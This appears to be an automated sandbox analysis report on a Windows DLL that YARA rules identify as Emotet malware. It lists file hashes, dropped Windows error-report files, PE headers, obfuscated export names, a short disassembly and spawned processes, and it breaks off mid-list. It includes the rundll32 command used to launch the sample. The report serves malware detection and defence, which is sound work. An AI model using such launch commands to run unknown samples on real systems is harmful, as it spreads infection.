MD5:	44F69CAA4D135F5CD097FEE4DB7DEE7C
SHA1:	79FDAE5E64EB40E2392403391CB6EC47CFD76A53
SHA-256:	1BC373F8157031EFD4F1E9DFA3D07E7D7A264D0752E87D34F7A6415A8213C331
SHA-512:	2B8CA42C626AA9DB4F29C2A614A4757F2D0845421EC4554781C33E8979D8CA5D0529AECFAE4B4067C9E04F7A02FA9799C76FDAD4567814CD6D97F6BC0D57B96B
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.8.0.8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF04F.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4558
Entropy (8bit):	4.4339661087292495
Encrypted:	false
SSDEEP:	48:cvIwSD8zsOJgtWI97ZVWSC8BS8fm8M4J2yGtFc+q84tjUKcQIcQwQjd:uITfEEqSNtJEkxUKkwQjd
MD5:	3EB2E3C69407A4BD9F6749D709EF66D7
SHA1:	CBFD8C507029F2CDCA987AC02E7B1B08587B5FC7
SHA-256:	5590CC5A365588272219BCE01663F3873D5AE6D227A17C299EF8330C910F3497
SHA-512:	01774F65AD9F008AF4FBAC2E9512EA746E404EBEF8FB0C4421B6E924AA65F3DD61AF8E530F7A3E8AECD6942910E5B78BE2133B6D85C00210393869CEE212DC31
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1279674" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB9F.tmp.csv Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	48982
Entropy (8bit):	3.0538369245779933
Encrypted:	false
SSDEEP:	768:KwH5w8QEZmAmLn6Z0iEng0skSlnUB2PpurHf7Q9PdqmqH1SJUH32WrDFGws:KwH5x13c6Z0iEng0skS9g2PpE/7Qddqw
MD5:	D1A2FA41294FBD1EA458D6CF85921A7B
SHA1:	E1BC5C1A5C644CD70181AD2EA97F7339F041E039
SHA-256:	0837245B4CE7F32A21700E4F1FD8854EE5C9055A253F03F04309D2C8BED57923
SHA-512:	35FA3E4A76C8E025C8ED5C3AC6C640E809D1FAAE6CA5BA013D28D13DC4F965AE9633B20FB032A1695581CB1A240D5851B070C38817A9AE2C28EA115F813224B9
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFF2A.tmp.txt Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6952607519478646
Encrypted:	false
SSDEEP:	96:9GiZYW5helD4BYWYLrWqFHoUYEZUNQtFiZOqzXwILg2ayUegJfCIXlQq3:9jZDjxltlayUegJflXqq3
MD5:	42FC2DA6DDCB05ED192B260D93C40EDE
SHA1:	ADA824AAF1B1459C68E39BA5BBBB6FF9B1CECAA0
SHA-256:	6FFEFDFD389A559B3D34D1B7D5CCBB3FC0A66B9016F55ED884049DE205138288
SHA-512:	B207B16B44F08AE1CF1CB9E6A56EC1B1F9252DF66C69FB00DB2ABC7DB2E82F6BD295D81BF5FBD1DF0003042BC2DEBF7440A7897C829FEEA931703A0509FF99BB
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log Download File
Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	9062
Entropy (8bit):	3.161842677130855
Encrypted:	false
SSDEEP:	192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3zW+x:j+s+v+b+P+m+0+Q+q+d+x
MD5:	BD2716FAABCDBA0419357545346C9D65
SHA1:	D82A6668E3B155343BF6FFCE052A7C296AC851DD
SHA-256:	FAC513272E863609EE8005B67F9667410AA40C9855FCC4EAD109DA5E3E35822B
SHA-512:	9393C40674BFD154668EB60AD2F7E66C249CF2982665F8E02467A9519E3FC4484436EFFE8EFD5BF6E44E89E37EB3A2E7F209C5DECBB4687D0CCC77F57AA1C81A
Malicious:	false
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20211202_064124_066.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.7990577585923155
Encrypted:	false
SSDEEP:	96:HCWD2o+wK5Ku9a/YhmCQSI2llvkeM4WOT2WjFzwNMCtdJR2j5LYNMCnj5UNMCL8W:iWCTAce2v+SCB0CFC8CkCsCZ
MD5:	29DCD877FBBA64860CCD5A42BC993715
SHA1:	3E18E0658F586F01524F4F7A2A6441E330BC34DF
SHA-256:	FB95E88E62E6139A75E6178A9729DE4531FB002552E7E5DB3F334992CFB79AF2
SHA-512:	CC852CB23D110B3DD75083BD9276D01AF7B4B8B31F15EA47DAC9B70FB0F43C5D655ACF8777E0B4A4922C5A7EFA5F9F7400E211B7E3FD9E87D73D670BE588499B
Malicious:	false
Preview:	.... ... ....................................... ...!...........................T...\...Ix+......................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..................................................................... .....k..G...........8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.1.1.2.0.2._.0.6.4.1.2.4._.0.6.6...e.t.l.........P.P.T...\...Ix+.....................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.274760548292374
Encrypted:	false
SSDEEP:	12288:1/C/cmEaJnheyGZQ1CN4Z5jWrrbbDZqeR65KDlwPUdmHSeE9TmHXh:1C/cmEaJnheyGZ4p
MD5:	8291D8E3272043357F076C4286BB25C0
SHA1:	80FCAEFEEC837176E6AD51F131393E6DD4C5F692
SHA-256:	CF6B8C452C2EC817592E7E665E3EDA3A52B8D19EB9B10DD0ACD1C19C68E5674C
SHA-512:	CB601D8000F8A919E77BC32DD186C8C255E8632F0E3DFDE2A2F275EF744852C2568AE99957E384F3353EA696132984EC201C4FEAACFC59E5020A3AFCC93C292D
Malicious:	false
Preview:	regf[...[...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm....G.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	3.4009990549955162
Encrypted:	false
SSDEEP:	192:wTMIv1gsrleERYe5FSEsWftx1vxgoJ4XMaJNSdkyFn6yvRrsfYWfYjdsiDoXzC7:UT55Rftx1vPJ4XM7FFn77Zd1DoXzC7
MD5:	2AC2AE14419AC5DEDEC626959210E553
SHA1:	FA562D8A95A8C10F0237BBDF5B97C467B77EB121
SHA-256:	3E018745B93A840DB43BE4D13BE9857BBA3F1435632744CDC68F2592B0AE8730
SHA-512:	E3415E769B956C5FD173F871BF98D42C79DFD98DFD5F408B21E1BD543BA3BE045C034E323FF69AE82B22C2FD2ED08EDB3F1B3CC514E2964B3ED76537B5E648F5
Malicious:	false
Preview:	regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm....G.................................................................................................................................................................................................................................................................................................................................................HvLE.>......Z...........%.T6...w......m.........0..............hbin................p.\..,..........nk,.._..G................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .._..G....... ........................... .......Z.......................Root........lf......Root....nk .._..G....................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.970966332978441
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	TYLNb8VvnmYA.dll
File size:	387072
MD5:	2b155f0eb4240dbe18024ca82e2418ca
SHA1:	a84ba84de27be3294350f7428de56355b4417a79
SHA256:	60b8988a2c2fc3f2108ab8cb49d8a7a566f5bcd2036dca941c5863f9085c3a9d
SHA512:	b16014d92bc2e35b047bf7a898aadc70bfca6cf1481047b8de10d86460ba6d76d8c8490e2bf1ffdb005b94f0a226ccf7338f2c557e97c9679005ce443d400656
SSDEEP:	6144:zBYrPMTsY8GR3j4fubnY6Zs/Bv6yi6aSTsfA2qL6jpXNcc6CEteuQJPIgtlpZ5L:yhmT4GbnYks/BJTWo2LjpScDEteuOIoZ
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0...Q...Q...Q..E#...Q..E#...Q..E#...Q../$...Q...$...Q...$...Q...$...Q..E#...Q...Q...Q...Q...Q../$...Q../$...Q..Rich.Q.........

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x1001cac1
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61A73B52 [Wed Dec 1 09:07:30 2021 UTC]
TLS Callbacks:	0x1000c340
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	609402ef170a35cc0e660d7d95ac10ce

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F6E14DC0D87h
call 00007F6E14DC1118h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F6E14DC0C33h
add esp, 0Ch
pop ebp
retn 000Ch
push ebp
mov ebp, esp
push dword ptr [ebp+08h]
call 00007F6E14DC162Eh
pop ecx
pop ebp
ret
push ebp
mov ebp, esp
jmp 00007F6E14DC0D8Fh
push dword ptr [ebp+08h]
call 00007F6E14DC5114h
pop ecx
test eax, eax
je 00007F6E14DC0D91h
push dword ptr [ebp+08h]
call 00007F6E14DC5190h
pop ecx
test eax, eax
je 00007F6E14DC0D68h
pop ebp
ret
cmp dword ptr [ebp+08h], FFFFFFFFh
je 00007F6E14DC16F3h
jmp 00007F6E14DC16D0h
push ebp
mov ebp, esp
push 00000000h
call dword ptr [1002A08Ch]
push dword ptr [ebp+08h]
call dword ptr [1002A088h]
push C0000409h
call dword ptr [1002A040h]
push eax
call dword ptr [1002A090h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [1002A094h]
test eax, eax
je 00007F6E14DC0D87h
push 00000002h
pop ecx
int 29h
mov dword ptr [1005E278h], eax
mov dword ptr [1005E274h], ecx
mov dword ptr [1005E270h], edx
mov dword ptr [1005E26Ch], ebx
mov dword ptr [1005E268h], esi
mov dword ptr [1005E264h], edi
mov word ptr [eax], es

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x5b590	0x614	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5bba4	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x60000	0x1bc0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x5a1dc	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x5a300	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x5a230	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2a000	0x154	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x28bb4	0x28c00	False	0.53924822661	data	6.1540438823	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x2a000	0x32362	0x32400	False	0.817805503731	data	7.406466363	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x5d000	0x1ba4	0x1200	False	0.287109375	data	2.60484752417	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.pdata	0x5f000	0x4c4	0x600	False	0.360677083333	AmigaOS bitmap font	2.17228109861	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0x60000	0x1bc0	0x1c00	False	0.7880859375	data	6.62631718459	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL

Import

KERNEL32.dll

HeapFree, HeapReAlloc, GetProcessHeap, HeapAlloc, GetModuleHandleA, GetProcAddress, TlsGetValue, TlsSetValue, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, AcquireSRWLockShared, ReleaseSRWLockShared, SetLastError, GetEnvironmentVariableW, GetLastError, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentThread, RtlCaptureContext, ReleaseMutex, WaitForSingleObjectEx, LoadLibraryA, CreateMutexA, CloseHandle, GetStdHandle, GetConsoleMode, WriteFile, WriteConsoleW, TlsAlloc, GetCommandLineW, CreateFileA, GetTickCount64, CreateFileW, SetFilePointerEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RaiseException, RtlUnwind, InterlockedFlushSList, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetFileType, GetStringTypeW, HeapSize, SetStdHandle, FlushFileBuffers, GetConsoleOutputCP, DecodePointer

USER32.dll

GetDC, ReleaseDC, GetWindowRect

Exports

Name	Ordinal	Address
Control_RunDLL	1	0x100010a0
axamexdrqyrgb	2	0x100017b0
bhramccfbdd	3	0x10001690
bptyjtyr	4	0x10001640
bxoqrnuua	5	0x100016c0
cegjceivzmgdcffk	6	0x100014e0
cgxpyqfkocm	7	0x10001480
chjbtsnqmvl	8	0x10001540
crfsijq	9	0x10001730
empxfws	10	0x10001590
fbgcvvbrlowsjsj	11	0x10001550
fjhmprw	12	0x10001660
gfqdajfucnxrv	13	0x10001850
hcloldazhuvj	14	0x10001790
idcumrbybo	15	0x10001500
ihvpwdsfllpvrzy	16	0x10001750
iuzqizpdhxqkmf	17	0x100014c0
jaarlqsruhrwpipt	18	0x100016e0
jndshbhgxdkvvtj	19	0x10001600
jniijdleqsyajeis	20	0x10001650
jtjqgma	21	0x100016f0
kffxtbzhfgbqlu	22	0x10001630
kwxkzdhqe	23	0x100016d0
lidhnvsukgiuabh	24	0x100016b0
ltcrkednwfkup	25	0x10001820
lvrmqgtvhsegpbvmq	26	0x10001770
mxvwvnerswyylp	27	0x10001520
ndlmbjceavqdintmv	28	0x100017d0
nvnriipkwrmxwsu	29	0x10001510
oafxfavxmi	30	0x10001570
ocwutlohg	31	0x100014b0
olcklbdvo	32	0x10001680
pawvqfmiz	33	0x100015e0
pdmomnjmmryopqza	34	0x10001560
plzkvjcbz	35	0x10001710
poasqvltrkgvepng	36	0x10001840
psjoyjhsrkg	37	0x100015b0
qdimtzieldbl	38	0x10001620
qzvngjfyuxpjag	39	0x10001580
relsounb	40	0x100016a0
rykebhcisi	41	0x10001670
snrvgvzpjh	42	0x100017c0
sqnfcfmocgbg	43	0x10001740
sxgllzweihxqxi	44	0x10001760
tgagxhhcfj	45	0x10001780
thjyvtvttwpah	46	0x10001830
uvypobslemtipv	47	0x10001640
vgidwtjsbwpxkdxj	48	0x100017a0
wahhdker	49	0x100014a0
wamqmispvbxt	50	0x100015f0
witvsjavqyw	51	0x10001720
wopabadcwdizvwlgk	52	0x10001490
wpzyecljz	53	0x10001800
wukgfirfwilhu	54	0x100015d0
xntbmrrxs	55	0x100017f0
xsxwxreryufxwuhh	56	0x10001700
xvgdevijtw	57	0x10001610
ydvqidso	58	0x100015c0
yggdjrsewuw	59	0x100015a0
zaeqdmhaky	60	0x100017e0
zakvwkjnk	61	0x10001700
zqbggkzy	62	0x100014f0
zqtdpertk	63	0x100014d0
zshfybkvzv	64	0x10001810
zxxopqyvfoesyhmup	65	0x10001530

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 5808 Parent PID: 5556

General

Start time:	22:41:04
Start date:	01/12/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\TYLNb8VvnmYA.dll"
Imagebase:	0xc60000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.582540666.0000000000A5C000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.558410733.0000000000A5C000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.558256416.00000000009E0000.00000040.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.581726309.0000000000A5C000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.582467938.00000000009E0000.00000040.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.601059851.00000000009E0000.00000040.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.601107965.0000000000A5C000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.559892277.0000000000A5C000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.581678982.00000000009E0000.00000040.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.559720602.00000000009E0000.00000040.00000010.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 4608 Parent PID: 5808

General

Start time:	22:41:04
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\TYLNb8VvnmYA.dll",#1
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 4524 Parent PID: 572

General

Start time:	22:41:05
Start date:	01/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4540 Parent PID: 5808

General

Start time:	22:41:05
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
